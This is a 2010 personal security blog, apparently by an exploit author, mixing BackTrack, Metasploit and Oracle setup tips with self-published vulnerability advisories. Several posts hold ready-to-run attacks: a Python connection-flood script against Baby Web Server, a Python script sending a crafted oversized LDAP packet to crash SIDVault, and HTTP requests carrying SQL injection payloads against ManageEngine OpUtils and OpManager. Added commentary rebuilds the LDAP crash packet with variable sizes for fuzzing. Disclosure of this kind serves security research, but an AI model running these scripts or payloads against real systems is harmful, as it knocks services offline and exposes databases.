Wednesday, December 15, 2010

Problem in Installation - Armitage

Problem while connecting to the MySQL database

Solution

1)msf > db_driver

2)msf > db_driver mysql

3)root@bt:/pentest/exploits/framework3# mysql -u root -p

4)mysql> CREATE USER msf3@localhost IDENTIFIED BY 'test';

5)mysql> CREATE DATABASE msf3;

6)mysql> GRANT ALL PRIVILEGES ON msf3.* TO msf3@localhost;

('test' is a throwaway lab password; if the database will outlive the VM, pick a real one and keep the grant limited to msf3.* as in step 6 rather than *.*.)


Another problem while installing: if you are using sqlite3, run

root@bt:/pentest/exploits/armitage# ./armitage.sh

and leave the password blank, i.e. the DB Connect String has no password.

Armitage Setup

To install Armitage in BackTrack,

1)root@bt:~# apt-get update

2)root@bt:~# apt-get install armitage

3)root@bt:~# msfrpcd -f -U msf -P test -t Basic

4)root@bt:~# /etc/init.d/mysql start



5)root@bt:/pentest/exploits/armitage# ./armitage.sh


In BackTrack the default MySQL credentials are root / toor; for PostgreSQL, or when using sqlite3, the password is left blank.

6)select the "Use SSL" checkbox, verify the rest of the settings and click "Connect".

Saturday, September 25, 2010

Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities

Details of the PoC can be viewed at:
http://www.exploit-db.com/exploits/15061/
http://www.securityfocus.com/bid/43345/info

Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
by

Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda

# Date 18th Sep 2010

# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities such as buffer overflow, integer overflow and denial of service (IE crash). This issue is triggered when an attacker convinces a victim user to visit a malicious website.

The "GetLicenseFromURLAsync" method does not handle its input correctly.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of the affected application, facilitating the remote compromise of affected computers. Failed exploit attempts will likely result in browser crashes.


Wednesday, August 18, 2010

Problem: No Internet in BackTrack 4 (BT4)

1) Start networking. On the command line type

bt# /etc/init.d/networking start

or use Menu -> Services -> NETWORK -> Start NETWORK

Then configure the network card:

Static IP address

ifconfig eth0 192.168.1.2

For a non-default subnet mask, give the mask explicitly (here a /27):
ifconfig eth0 192.168.1.2 netmask 255.255.255.224


Add a default gateway:

route add default gw 192.168.1.1 eth0

Replace the IP address with that of your default gateway; it must lie inside the subnet configured on eth0 or the route will not be added.


Assign DNS servers (a single > overwrites /etc/resolv.conf; use >> to append a second nameserver):

echo nameserver 200.1.1.1 > /etc/resolv.conf


For DHCP

dhcpcd eth0
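The checks worth running before typing the static-IP commands above, as an added example that is not part of the original post: it validates the ifconfig/route/resolv.conf values with Python's ipaddress module, using the addresses from the steps (192.168.1.2 with mask 255.255.255.224, gateway 192.168.1.1, nameserver 200.1.1.1) as constructed input, and generates the same commands from the checked values. A gateway outside the configured subnet is a common reason the default route does not get added after a static setup, and it is the first thing this catches.

```python
import ipaddress

# Values from the steps above (200.1.1.1 is the page's placeholder nameserver).
EXAMPLE = {"ip": "192.168.1.2", "netmask": "255.255.255.224",
           "gateway": "192.168.1.1", "nameservers": ["200.1.1.1"]}


def prefix_length(netmask):
    """Dotted netmask -> CIDR prefix length, e.g. 255.255.255.224 -> 27."""
    return ipaddress.ip_network(f"0.0.0.0/{netmask}").prefixlen


def check_static_config(ip, netmask, gateway, nameservers=()):
    """Validate the ifconfig/route/resolv.conf values before applying them.

    Returns (ok, problems). Catches a gateway outside the subnet the netmask
    defines (route add then fails with 'SIOCADDRT: No such process') and an
    IP that is the network or broadcast address.
    """
    problems = []
    try:
        iface = ipaddress.ip_interface(f"{ip}/{netmask}")
        gw = ipaddress.ip_address(gateway)
    except ValueError as exc:
        return False, [f"bad address or netmask: {exc}"]
    net = iface.network
    if iface.ip in (net.network_address, net.broadcast_address):
        problems.append(f"{ip} is the network or broadcast address of {net}")
    if gw not in net:
        problems.append(f"gateway {gateway} is not inside {net}")
    if gw == iface.ip:
        problems.append("gateway must not be the host's own address")
    for ns in nameservers:
        try:
            ipaddress.ip_address(ns)
        except ValueError:
            problems.append(f"bad nameserver {ns!r}")
    return not problems, problems


def render_commands(ip, netmask, gateway, nameservers, iface="eth0"):
    """The shell commands from the steps above, generated from checked values."""
    ok, problems = check_static_config(ip, netmask, gateway, nameservers)
    if not ok:
        raise ValueError("; ".join(problems))
    cmds = [f"ifconfig {iface} {ip} netmask {netmask}",
            f"route add default gw {gateway} {iface}"]
    # The first nameserver overwrites resolv.conf (>), later ones append (>>),
    # so a stale nameserver line is replaced instead of duplicated.
    for i, ns in enumerate(nameservers):
        cmds.append(f"echo nameserver {ns} {'>' if i == 0 else '>>'} /etc/resolv.conf")
    return cmds


if __name__ == "__main__":
    print("\n".join(render_commands(**EXAMPLE)))
```

Run it with the values of your own network; if check_static_config reports a problem, fix the address plan before touching the interface rather than debugging "no internet" afterwards.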

Metasploit db_create error

msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.

Solution
Just use


msf > db_driver sqlite3

or
msf > db_connect

Sunday, June 13, 2010

Installing Oracle Client using TOAD

1)Install the oracle instant client. (instantclient_10_2)
Unzip the files to a directory, and then copy the path of this directory to the clipboard.

2)Add this directory to the PATH environment variable.
Right-click My Computer, go to the Advanced tab and click 'Environment Variables'. Under System variables, find 'Path', select it and click Edit. Press Ctrl-V to paste the directory onto the end of the string and click OK, e.g.:

Before:C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\

After: C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\;C:\instantclient_10_2


3)In the same window, under 'User variables for ...', Click the New button. Call the variable 'TNS_ADMIN'. ctrl-v to paste the directory path into the 'variable value' field. Say OK, and close out the 'My Computer' properties windows.

e.g. Variable name: TNS_ADMIN
Variable value: C:\instantclient_10_2


4)Create a file called 'TNSNAMES.ORA' in your instant client installation directory. In this file designate the connection parameters for your database. Mine looked something like this:

DB_ALIAS =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = ip.add.re.ss)(PORT = 1521))
)
(CONNECT_DATA =
(SID = orcl)
(SERVER = DEDICATED)
)
)

replace the DB_ALIAS, ip.add.re.ss, port, and SID with your settings.


5)Restart your computer, fire up Toad and open a new connection. You should see DB_ALIAS as an option under the database field. Enter your username and password and hit Connect.
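An added example, not from the original post: a small parser for the parenthesised tnsnames.ora format shown in step 4, so the host, port and SID that TOAD will resolve for DB_ALIAS can be read back from the file TNS_ADMIN points at instead of guessed when a connection fails. The sample text is the entry above plus a constructed second alias (REPORTS, host 10.0.0.5, port 1522, SERVICE_NAME reports.example.com) to exercise repeated keys and SERVICE_NAME handling. The mini-grammar it implements, '(KEY = value)' groups whose keys may repeat, is an assumption that covers files of this shape; it is not a complete Oracle Net parser.

```python
import re

# Constructed sample: the tnsnames.ora from step 4 plus a second alias.
TNSNAMES_SAMPLE = """
# comment lines start with '#'
DB_ALIAS =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = ip.add.re.ss)(PORT = 1521))
)
(CONNECT_DATA =
(SID = orcl)
(SERVER = DEDICATED)
)
)
REPORTS = (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 10.0.0.5)(PORT = 1522))
          (CONNECT_DATA = (SERVICE_NAME = reports.example.com)))
"""

_TOKEN = re.compile(r"\(|\)|=|[^\s()=]+")


def _parse_group(tokens, i):
    """Parse adjacent '(KEY = value)' groups into a dict of lists.

    Keys may repeat (several ADDRESS entries in one ADDRESS_LIST), so every
    value is stored in a list. Returns (dict, index of next unconsumed token).
    """
    node = {}
    while i < len(tokens) and tokens[i] == "(":
        if i + 3 >= len(tokens):
            raise ValueError("truncated entry")
        key = tokens[i + 1].upper()
        if tokens[i + 2] != "=":
            raise ValueError(f"expected '=' after {key}")
        if tokens[i + 3] == "(":
            value, i = _parse_group(tokens, i + 3)
        else:
            value, i = tokens[i + 3], i + 4
        if i >= len(tokens) or tokens[i] != ")":
            raise ValueError(f"unbalanced parentheses in {key}")
        node.setdefault(key, []).append(value)
        i += 1
    return node, i


def parse_tnsnames(text):
    """tnsnames.ora text -> {ALIAS: {'DESCRIPTION': [ {...} ]}}."""
    body = "\n".join(line for line in text.splitlines()
                     if not line.lstrip().startswith("#"))
    tokens = _TOKEN.findall(body)
    entries, i = {}, 0
    while i < len(tokens):
        alias = tokens[i].upper()
        if i + 2 >= len(tokens) or tokens[i + 1] != "=" or tokens[i + 2] != "(":
            raise ValueError(f"malformed entry near {alias}")
        value, i = _parse_group(tokens, i + 2)
        entries[alias] = value
    return entries


def connect_params(entries, alias):
    """Host, port and SID (or SERVICE_NAME) that the client will use for an alias."""
    desc = entries[alias.upper()]["DESCRIPTION"][0]
    # ADDRESS may sit directly under DESCRIPTION or inside an ADDRESS_LIST.
    holder = desc["ADDRESS_LIST"][0] if "ADDRESS_LIST" in desc else desc
    addr = holder["ADDRESS"][0]
    cd = desc["CONNECT_DATA"][0]
    return {"host": addr["HOST"][0], "port": int(addr["PORT"][0]),
            "sid": cd.get("SID", [None])[0],
            "service_name": cd.get("SERVICE_NAME", [None])[0]}
```

Point it at the real file (open(os.path.join(os.environ["TNS_ADMIN"], "tnsnames.ora")).read()) to confirm the alias resolves to the host you expect before entering credentials; a stale or mis-copied entry otherwise sends the login to the wrong listener.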

Friday, March 5, 2010

File association fixes for Windows Vista

This page contains the file association fixes for some of the most common file types. The fixes are applicable to Windows® Vista systems only.

http://www.winhelponline.com/articles/105/1/File-association-fixes-for-Windows-Vista.html


Broken EXE Association

Executable (.EXE) files are the programs you run for most tasks on a computer. Now and again someone reports that they have, in error, assigned some other program to the .EXE extension without first establishing a System Restore Point so they can recover from making this error. When that happens little will run on the computer. Instead, when an .EXE file is clicked some program will start and attempt to process that file instead.

http://filext.com/faq/broken_exe_association.php

Wednesday, March 3, 2010

Opera (plenitude String) Denial of Service Exploit

http://www.packetstormsecurity.org/1003-exploits/operaplen-crash.txt
http://www.exploit-db.com/exploits/11617


=======================================================================

Opera (plenitude String) Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda


#Download http://www.opera.com/download/


#Background

Opera is a popular internet browser :)

#Vulnerability
This bug is a typical result of an attacker writing an extremely long ("plenitude") string through the
document.write() function. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.



#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
Copy the code into a text file, save it as "asheesh.html" and open it in Opera (the script itself is not reproduced here, as Blogger strips script tags; see the packetstorm / exploit-db links above).




Why do you worry without cause? Whom do you fear without reason? Who can kill you?
The soul is neither born, nor does it die.


#If you have any questions, comments, or concerns, feel free to contact me.

Mozilla Firefox 3.6 plenitude String Crash (0day) Exploit

link:http://www.exploit-db.com/exploits/11617
link:http://www.packetstormsecurity.org/1003-exploits/mozff36-crash.txt

for code

=======================================================================

Mozilla Firefox 3.6 plenitude String Crash (0day) Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of an attacker writing an extremely long ("plenitude") string through the
document.write() function. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Mozilla crash :)


#Proof of concept
Copy the code into a text file, save it as "asheesh.html" and close all other tabs and windows to avoid losing any data (the script itself is not reproduced here, as Blogger strips script tags; see the exploit-db / packetstorm links above).

Open it in Mozilla Firefox, wait about 15 seconds ...... :) and say goodbye,

Mozilla .......

But before that, take one last look at Mozilla :) Say it with love: Jai Mata Di

Mozilla, Rest In Peace!!!!!!!!!!!!!!!!!!!!!!!!!!!



BHAGAVAD GITA Quote
You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God!

You came empty-handed, and you will leave empty-handed. What is yours today belonged to someone else yesterday and will belong to someone else tomorrow. You become absorbed in it thinking it is yours, and that very pleasure is the cause of your sorrows.

#If you have any questions, comments, or concerns, feel free to contact me.

Thursday, February 18, 2010

Internet Explorer 8 (Multitudinous looping) Denial of Service Exploit

http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281


For the code, visit the links above; Blogger does not allow script in posts.



=======================================================================

Internet Explorer 8 (Multitudinous looping) Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)


#Background

Internet Explorer 8 is a popular internet browser, with lots of bugs .....:)

#Vulnerability
This bug is a typical result of a multitudinous (very large) loop.
The flaw exists within the "history go" ActiveX control, which contains
stack-based overflow conditions. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact

The attacker can run any Windows command, consume lots of memory and crash your IE or make
your system inaccessible; your work, if any, might be lost.

#Proof of concept
Copy the code into a text file, save it as "asheesh.html" and open it in Internet Explorer 8.

========================================================================================================================

asheesh.html
========================================================================================================================

(The script body of asheesh.html is not reproduced here: Blogger strips script tags, and only the page text "asheesh kumar mani tripathi" survives. The code is at the exploit-db and full-disclosure links above.)

========================================================================================================================




#If you have any questions, comments, or concerns, feel free to contact me.






Mozilla Firefox 3.6 (Multitudinous looping) Denial of Service Exploit


http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280

=======================================================================

Mozilla Firefox 3.6 (Multitudinous looping) Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of a multitudinous (very large) loop.
The flaw exists when the attacker puts the window.print() function
in a multitudinous loop. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
Copy the code into a text file, save it as "asheesh.html" and open it in Mozilla Firefox.

========================================================================================================================

asheesh.html
========================================================================================================================

(The script body of asheesh.html is not reproduced here: Blogger strips script tags, and only the page text "asheesh kumar mani tripathi" survives. The code is at the exploit-db and full-disclosure links above.)

========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability


http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt

================================================================================

ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================

#Date-3/2/10
# code by Asheesh kumar Mani Tripathi

# AKS IT Services

# Credit by Asheesh Anaconda


#Download http://www.manageengine.com/products/oputils

#Vulnerability
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.


========================================================================================================================

Request
========================================================================================================================

POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0



========================================================================================================================
Response
========================================================================================================================


HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583

Sunday, January 24, 2010

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html



Blind SQL/XPath injection in OPMANAGER

packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289


Exploit Code

*******************************Blind SQL/XPath injection in OPMANAGER***********************************




# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]



Description

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Vulnerable:

http://overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[SQL injection]&isFromInfra=yes HTTP/1.0


GET /overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+31337-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache

Response:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8
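The OpUtils Login.do request in the previous post and the OpManager overview.do request above use the same test: append a condition that is always true (31337-31337=0) and see whether the application still answers as before. As an added example, not code from either advisory, the block below shows that bug class in a string-built query next to its parameterised fix, and a probe that compares the page for a true and a false injected condition instead of relying on a 200 OK alone (a safe endpoint also returns 200). It runs against an in-memory SQLite table constructed for the purpose, using the single-quote form from the OpManager request; the double-quote form in the OpUtils request only works where the backend treats double quotes as string delimiters.

```python
import sqlite3

# Constructed stand-in for the application's table; not OpManager's or OpUtils' schema.
_ROWS = [("AJAX", "voip dashboard fragment"), ("HTML", "full page")]


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE views (request_type TEXT, body TEXT)")
    con.executemany("INSERT INTO views VALUES (?, ?)", _ROWS)
    return con


def render_vulnerable(request_type):
    """Concatenates the parameter into the SQL text (the bug class reported above)."""
    sql = "SELECT body FROM views WHERE request_type = '%s'" % request_type
    try:
        rows = _db().execute(sql).fetchall()
    except sqlite3.Error:
        rows = []  # many apps swallow the error and still answer 200 OK
    return "".join(r[0] for r in rows)


def render_safe(request_type):
    """Binds the parameter; the quote and the arithmetic never reach the SQL parser."""
    rows = _db().execute(
        "SELECT body FROM views WHERE request_type = ?", (request_type,)).fetchall()
    return "".join(r[0] for r in rows)


TRUE_COND = "' and 31337-31337=0 -- "   # always true, as in the advisory
FALSE_COND = "' and 31337-31337=1 -- "  # same shape, always false


def boolean_blind_probe(render, value):
    """True if the page differs for a true versus a false injected condition.

    The tell is that the true condition reproduces the baseline page while the
    false one does not; the status code is the same in both cases.
    """
    baseline = render(value)
    true_page = render(value + TRUE_COND)
    false_page = render(value + FALSE_COND)
    return true_page == baseline and false_page != baseline
```

In the field, render() is the function that sends the HTTP request and returns the body (or a stable hash of it); the true/false pair is what separates a real injection point from an endpoint that simply ignores junk in the parameter.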

Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability

Pablo Software Solutions Baby Web Server is prone to a remote denial-of-service vulnerability. An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
http://exploits.offensive-security.com/record.php?id=10171&type=dos
packetstormsecurity.org/0911-exploits/babywebserver.py.txt
http://www.securityfocus.com/bid/36942

Exploit Code
#!/usr/bin/env python3
# Author: Asheesh Kumar Mani Tripathi
# Created: Asheesh Kumar Mani Tripathi
# Baby Web Server 2.7.2 denial of service: the server cannot cope with a burst of
# ~1100 requests arriving on separate connections.
# Usage: python3 babywebserver.py <victim ip> [port]   (default 127.0.0.1:80)
import socket
import sys

print("****************************************************")
print("Baby Web Server 2.7.2 Vulnerability found: Denial of Service")
print("Usage: babywebserver.py <victim ip> [port]")
print("Author: Asheesh Kumar Mani Tripathi")
print("Reason for the DoS attack: the server is unable to handle so many requests")
print("*****************************************************")

host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
request = b"GET /some.txt HTTP/1.1 \n\n"

connections = []  # keep the sockets referenced so they stay open until the script exits
try:
    for i in range(1, 1100):
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send(request)
        connections.append(connection)
        print(i)
except socket.error as exc:
    print("Oh! Some problem occurred (%s); check whether the server is running" % exc)

SIDVault Remote Denial of Service

#links-http://downloads.securityfocus.com/vulnerabilities/exploits/36394.py
#http://www.packetstormsecurity.org/0909-exploits/sidvault20evista-crash.txt
#http://inj3ct0r.com/%5Bremote%5D/1292
#SIDVault is prone to a remote denial-of-service vulnerability.
#Successful exploits allow remote attackers to cause the affected server to stop
#responding, denying service to legitimate users.
#SIDVault 2.0e for Windows is vulnerable; other versions may also be affected.

#!/usr/bin/env python3

#
# $ ./ldap.py <target ip>
#
# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe)
# Tested on Vista Home Premium SP1, Windows XP SP1, SP2, SP3
# Coded by: asheesh anaconda

# Group DarkShinners


import sys
import socket

# Oversized LDAP SearchRequest: a base DN of "dc=" + 4095 'A's + a 4-byte tail.
addr = b"\x33\xbf\x96\x7c"
healthpacket = b"\x41" * 4095 + addr
# LDAPMessage SEQUENCE (len 0x102f), messageID 1, SearchRequest [APPLICATION 3]
# (len 0x1028), baseObject OCTET STRING (len 0x1006) = "dc=" + healthpacket
evilpacket = b"0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc="
evilpacket += healthpacket
# scope=wholeSubtree, derefAliases=never, sizeLimit=0, timeLimit=0,
# typesOnly=FALSE, filter (objectClass=*), empty attribute list
evilpacket += b"\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00"

if len(sys.argv) != 2:
    sys.exit("usage: %s <target ip>" % sys.argv[0])

print("[+] Sending evil packet")
print("[+] Wait, LDAP is getting crashed!!!!!!!!!!!!")


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(evilpacket)
s.close()
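The hard-coded request in the script above is an LDAP SearchRequest whose BER length fields (0x102f, 0x1028, 0x1006) were worked out by hand for the 4102-byte base DN. As an added example, not part of the advisory, the block below builds the same message from its fields with a small BER encoder, so the DN size (and the 4-byte tail the script calls addr, kept here as opaque bytes) can be varied without recomputing lengths; the rebuilt packet is compared against the original bytes. Message ID 1, scope wholeSubtree and the (objectClass=*) filter match the script. The encoder handles only message IDs below 128 (single-byte INTEGER), an assumption that is sufficient here.

```python
# Minimal BER/LDAP builder; reproduces the advisory's packet from its fields.
SEQUENCE = 0x30
INTEGER = 0x02
OCTET_STRING = 0x04
ENUMERATED = 0x0A
BOOLEAN = 0x01
SEARCH_REQUEST = 0x63      # [APPLICATION 3], constructed
FILTER_PRESENT = 0x87      # [CONTEXT 7], primitive: (attr=*)


def ber_length(n):
    """Definite-form BER length: short form below 128, else 0x80|k then k big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, value):
    """Tag, length, value."""
    return bytes([tag]) + ber_length(len(value)) + value


def ldap_search_request(base_dn, message_id=1, scope=2, filter_attr=b"objectClass"):
    """LDAPMessage{messageID, SearchRequest} with an (attr=*) filter and no attributes.

    message_id must be below 128 (assumption: single-byte INTEGER encoding).
    """
    if not 0 <= message_id < 0x80:
        raise ValueError("message_id must be in 0..127")
    req = tlv(SEARCH_REQUEST,
              tlv(OCTET_STRING, base_dn)
              + tlv(ENUMERATED, bytes([scope]))   # 2 = wholeSubtree
              + tlv(ENUMERATED, b"\x00")          # derefAliases = neverDerefAliases
              + tlv(INTEGER, b"\x00")             # sizeLimit = 0
              + tlv(INTEGER, b"\x00")             # timeLimit = 0
              + tlv(BOOLEAN, b"\x00")             # typesOnly = FALSE
              + tlv(FILTER_PRESENT, filter_attr)  # (objectClass=*)
              + tlv(SEQUENCE, b""))               # attributes: none
    return tlv(SEQUENCE, tlv(INTEGER, bytes([message_id])) + req)


# The advisory's packet: 4095 'A's followed by the 4-byte tail it calls addr.
ADVISORY_TAIL = b"\x33\xbf\x96\x7c"
ADVISORY_PACKET = (b"0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc="
                   + b"A" * 4095 + ADVISORY_TAIL
                   + b"\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00"
                   + b"\x87\x0bobjectClass0\x00")


def advisory_packet_rebuilt():
    """Same message built from fields; must equal ADVISORY_PACKET byte for byte."""
    return ldap_search_request(b"dc=" + b"A" * 4095 + ADVISORY_TAIL)


if __name__ == "__main__":
    pkt = advisory_packet_rebuilt()
    print(len(pkt), "bytes; matches advisory:", pkt == ADVISORY_PACKET)
```

Because every length is derived, a fuzzing loop over DN sizes (or over the tail bytes) stays a well-formed LDAPMessage, which is what distinguishes a crash in the server's DN handling from one in its BER decoder.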